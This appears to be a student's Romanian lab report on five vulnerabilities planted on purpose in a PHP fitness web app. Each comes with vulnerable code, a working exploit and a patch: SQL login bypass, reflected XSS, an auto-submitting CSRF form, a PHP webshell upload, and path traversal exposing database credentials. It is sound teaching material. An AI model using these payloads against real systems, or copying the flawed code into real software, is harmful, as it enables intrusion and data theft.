================================================================
       DOCUMENTATIE SECURITATE - FITTRACK WEB APP
================================================================
Autor: Florea Rares-Pavel
Aplicatie: FitTrack - Aplicatie web de fitness tracking
Tehnologii: PHP, MySQL, SQLite, HTML, CSS, JavaScript
================================================================


----------------------------------------------------------------
1. SQL INJECTION
----------------------------------------------------------------

DESCRIERE:
SQL Injection este o vulnerabilitate care permite unui atacator
sa modifice query-urile SQL executate de aplicatie prin
introducerea de cod SQL malitios in campurile de input.

FISIER AFECTAT: login.php

COD VULNERABIL:
    $query = "SELECT * FROM users WHERE username = '$username'";
    $user = $pdo->query($query)->fetch();

EXPLOIT:
    In campul Username se introduce:
        ' OR '1'='1

    Query-ul devine:
        SELECT * FROM users WHERE username = '' OR '1'='1'

    Deoarece '1'='1' este intotdeauna adevarat, serverul
    returneaza primul utilizator din baza de date, acordand
    acces fara a cunoaste parola.

IMPACT:
    - Bypass autentificare fara parola
    - Acces neautorizat la conturile utilizatorilor
    - In scenarii mai complexe: extragerea intregii baze de date

COD SECURIZAT (patch):
    $stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
    $stmt->execute([$username]);
    $user = $stmt->fetch();
    if ($user && password_verify($password, $user['password_hash']))

    Folosirea prepared statements elimina posibilitatea injectiei
    deoarece input-ul utilizatorului este tratat ca date, nu cod.


----------------------------------------------------------------
2. CROSS-SITE SCRIPTING (XSS)
----------------------------------------------------------------

DESCRIERE:
XSS permite unui atacator sa injecteze cod JavaScript malitios
intr-o pagina web, care se executa in browserul altor utilizatori.
Acesta este de tip Reflected XSS — payload-ul vine din URL si
este reflectat imediat in raspunsul serverului.

FISIER AFECTAT: index.php

COD VULNERABIL:
    if (isset($_GET['search'])) {
        $search = $_GET['search'];
        echo "<p>Ai cautat: " . $search . "</p>";
    }

EXPLOIT:
    Se acceseaza urmatorul URL in browser:
        http://localhost/fittrack/index.php?search=<script>alert('XSS')</script>

    Serverul afiseaza direct input-ul fara sanitizare, iar
    browserul executa codul JavaScript injectat.

IMPACT:
    - Furtul cookie-urilor de sesiune (hijacking)
    - Redirectionarea utilizatorilor catre site-uri malitioase
    - Modificarea continutului paginii vazut de victima
    - Atacuri de tip phishing in contextul site-ului legitim

COD SECURIZAT (patch):
    $search = htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8');
    echo "<p>Ai cautat: " . $search . "</p>";

    htmlspecialchars() converteste caracterele speciale (<, >, ", ')
    in entitati HTML, prevenind executia codului injectat.


----------------------------------------------------------------
3. CROSS-SITE REQUEST FORGERY (CSRF)
----------------------------------------------------------------

DESCRIERE:
CSRF permite unui atacator sa determine un utilizator autentificat
sa execute actiuni nedorite pe o aplicatie web, fara stirea sa.
Browserul trimite automat cookie-urile de sesiune, deci serverul
nu poate distinge intre o cerere legitima si una malitioasa.

FISIER AFECTAT: profile.php

VULNERABILITATE:
    Formularul de salvare profil nu contine niciun token CSRF,
    astfel orice site extern poate trimite un POST la profile.php
    si modifica datele utilizatorului logat.

EXPLOIT (csrf_exploit.html - pagina atacatorului):
    <form id="csrfForm" method="POST"
          action="http://localhost/fittrack/profile.php">
        <input type="hidden" name="telefon" value="0000000000">
        <input type="hidden" name="varsta" value="99">
        <input type="hidden" name="gen" value="feminin">
        <input type="hidden" name="goal" value="slabit">
        <input type="hidden" name="save_profile" value="1">
    </form>
    <script>document.getElementById('csrfForm').submit();</script>

    Victima acceseaza pagina atacatorului (ex. printr-un link
    din email), formularul se trimite automat, iar profilul
    victimei este modificat fara stirea ei.

IMPACT:
    - Modificarea datelor de profil ale utilizatorilor
    - In aplicatii bancare: transferuri neautorizate
    - Schimbarea parolei sau emailului contului victimei

COD SECURIZAT (patch):
    // Generare token la inceputul sesiunii
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));

    // Adaugare token in formular
    <input type="hidden" name="csrf_token"
           value="<?= $_SESSION['csrf_token'] ?>">

    // Verificare token la primirea cererii
    if ($_POST['csrf_token'] !== $_SESSION['csrf_token']) {
        die("CSRF detectat!");
    }


----------------------------------------------------------------
4. UNRESTRICTED FILE UPLOAD
----------------------------------------------------------------

DESCRIERE:
Unrestricted File Upload permite unui atacator sa incarce fisiere
de orice tip pe server, inclusiv fisiere PHP executabile
(webshell-uri), obtinand astfel control asupra serverului.

FISIER AFECTAT: profile.php (sectiunea upload poza profil)

COD VULNERABIL:
    if (isset($_POST['upload'])) {
        $file = $_FILES['profile_pic'];
        $filename = $file['name']; // pastreaza numele original
        $destination = 'uploads/' . $filename;
        move_uploaded_file($file['tmp_name'], $destination);
    }

EXPLOIT:
    1. Se creeaza un fisier shell.php cu continut:
        <?php
        if (isset($_GET['cmd'])) {
            echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
        }
        ?>

    2. Se incarca shell.php prin formularul de upload poza profil

    3. Se acceseaza:
        http://localhost/fittrack/uploads/shell.php?cmd=whoami

    4. Serverul executa comanda si returneaza rezultatul:
        desktop-0dsvmrk\rares

IMPACT:
    - Executie de comenzi arbitrare pe server (RCE)
    - Acces complet la sistemul de fisiere al serverului
    - Posibilitatea de a sterge, modifica sau exfiltra date
    - Compromiterea completa a serverului

COD SECURIZAT (patch):
    $allowed_types = ['image/jpeg', 'image/png', 'image/gif'];
    $allowed_extensions = ['jpg', 'jpeg', 'png', 'gif'];

    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    $mime = mime_content_type($file['tmp_name']); // verifica continutul real

    if (!in_array($mime, $allowed_types) ||
        !in_array($ext, $allowed_extensions)) {
        die("Tip de fisier nepermis!");
    }

    // Redenumeste fisierul pentru a elimina extensia periculoasa
    $filename = 'user_' . $user_id . '.' . $ext;


----------------------------------------------------------------
5. PATH TRAVERSAL
----------------------------------------------------------------

DESCRIERE:
Path Traversal permite unui atacator sa acceseze fisiere din
afara directorului permis, folosind secvente "../" pentru a
naviga in arborele de directoare al serverului.

FISIER AFECTAT: view_file.php (fisier creat pentru demonstratie)

COD VULNERABIL:
    if (isset($_GET['file'])) {
        $file = $_GET['file']; // fara sanitizare
        $path = 'uploads/' . $file;
        echo file_get_contents($path);
    }

EXPLOIT:
    Se acceseaza in browser:
        http://localhost/fittrack/view_file.php?file=../db.php

    Serverul construieste calea: uploads/../db.php
    care se rezolva la: db.php

    Sunt afisate credentialele bazei de date:
        $host = '127.0.0.1';
        $user = 'root';
        $pass = '';
        $dbname = 'fittrack';

    Se pot accesa si alte fisiere:
        ?file=../login.php
        ?file=../register.php

IMPACT:
    - Citirea fisierelor de configurare cu credentiale
    - Accesul la codul sursa al aplicatiei
    - Citirea fisierelor de sistem sensibile
    - Obtinerea de informatii pentru atacuri ulterioare

COD SECURIZAT (patch):
    $file = basename($_GET['file']); // elimina ../
    $path = realpath('uploads/' . $file);
    $allowed_dir = realpath('uploads/');

    // Verifica ca fisierul e in directorul permis
    if (strpos($path, $allowed_dir) !== 0) {
        die("Acces nepermis!");
    }

    echo file_get_contents($path);

    basename() elimina orice secventa de tip "../" din input,
    iar realpath() + verificarea prefixului garanteaza ca
    fisierul accesat e in directorul uploads/.


================================================================
CONCLUZII
================================================================

Toate cele 5 vulnerabilitati au fost introduse intentionat pentru
demonstrarea exploit-urilor in cadrul laboratorului de Programare
Web. Dupa predarea laboratorului, aplicatia a fost securizata
prin aplicarea patch-urilor descrise mai sus pentru fiecare
vulnerabilitate in parte.

Vulnerabilitatile demonstrate:
    [1] SQL Injection      - bypass autentificare
    [2] XSS Reflected      - executie JavaScript malitios
    [3] CSRF               - actiuni neautorizate in numele victimei
    [4] Unrestricted Upload - executie cod pe server (RCE)
    [5] Path Traversal     - citire fisiere sensibile

================================================================